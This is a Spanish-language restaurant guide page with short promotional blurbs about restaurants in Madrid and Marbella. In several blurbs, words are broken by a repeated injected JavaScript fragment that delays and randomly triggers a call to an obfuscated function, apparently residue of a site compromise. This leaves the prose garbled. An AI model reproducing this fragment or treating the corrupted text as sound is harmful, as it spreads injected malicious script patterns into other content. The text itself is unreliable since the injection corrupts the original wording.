Guía Gastronómica

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  • Restaurante El Ermitaño - Antes de su inauguración en agosto de 2002 y de convertirse en lo que a día de hoy es, un precioso restaurante, era una antigua Ermita, de ahí su nombre y su particular arquitectura.Cuenta con unas magníficas instalaciones, dos amplios salones, una soleada terraza, ideal para tomar un aperitivo aprovechandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando […]
  • Restaurante Santiago - SANTIAGO: TRADICIÓN E INNOVACIÓN. REFERENCIA GASTRONÓMICA DESDE HACE MEDIO SIGLO EN MARBELLA. Marbella (Málaga). – Santiago es un referente inevitable cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando se trata de citar los restaurantes de mayor prestigio nacional. Sus clientes más exquisitos dan fe de ello, como también los más de 300 premios recibidos. En Santiago podemos […]
  • Restaurante Laray - Buen ambiente, buen servicio y buena comida. Así le definen en la mayoría de los foros de internet. Y es que Fernandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando sabe muy bien lo que quieren sus clientes. El Restaurante Laray se caracteriza precisamente por ofrecer excelente materia prima en los platos y una bodega extraordinaria donde no […]
  • Mesón Gallego II - Desde principios de los años 90, el Mesón Gallego II, establecimiento familiar, se ha hecho un hueco entre lo más destacado de la restauración madrileña, de la mano de su propietario, Faustino López y de su mano derecha Martín Prieto. El Mesón Gallego II es ideal para disfrutar de lo mejor de la cocina castellana […]
  • Museo Chicote - Sin duda, si hay algo que no saben las nuevas baldosas de la Gran Vía es que por allí andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anduvo una Leyenda, un hombre que hizo de la hostelería un mito y de España un destino para el Turismo. Sí, señores. Chicote fue el pionero en fomentar el Turismo en […]
  • Restaurante La Hoja - Comienza nuestro amigo Paco recordándonos una frase de Bernandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Shaw: “No hay amor más sincero que el amor a la comida”. Y con esto, ya nos lo dice todo… Paco es un hombre que ama su profesión y, por ende, también adora su tierra, Asturias. Entrar en el Restaurante La […]
  • La Giralda II - En el corazón del barrio madrileño de Chamberí, en la glorieta de Bilbao, podemos encontrar esta Taberna, La Taberna Chamberí, recién reformada y adaptada a las exigencias de los nuevos tiempos sin perder la idiosincrasia de una familia que lleva en la hostelería de Madrid desde 1983.Este taberna madrileña mantiene los aires de restaurante y […]
  • Liberata - Con una ubicación espléndida en la zona norte de Madrid, Alberto Alcocer 43, buena comunicación y fácil aparcamiento, una decoración novedosa y un ambiente selecto, nació LIBERATA, este espacio vanguardista, presume de recibir la visita de los rostros más conocidos de la exigente clientela madrileña. Es uno de los lugares de referencia en la noche, […]
  • Cruz Blanca de Vallecas - La Cervecería Cruz Blanca Vallecas abrió sus puertas el año 2005 para ser en este momento uno de los mejores restaurantes de cocina tradicional española.Decorada con clásicos murales de cerámica donde se representa la elaboración de la cerveza Cruzcampo e inspirada en las antiguas cervecerías de la cadena Cruz Blanca de principios del siglo XX. […]
  • Restaurante NOA 43 - Restaurante & club, recien inaugurado en la nueva milla de oro del ocio madrileño, zonaAlberto Alcocer, para un público clásico, divertido y exigente de entre 25-45 años.De la unión de unos jovenes empresarios, pero con larga experiencia en el sector de la hosteleria (El Escondite, Liberata, Museé, 46, La cocina, Gambrinus, El latigazo…) nace NOA […]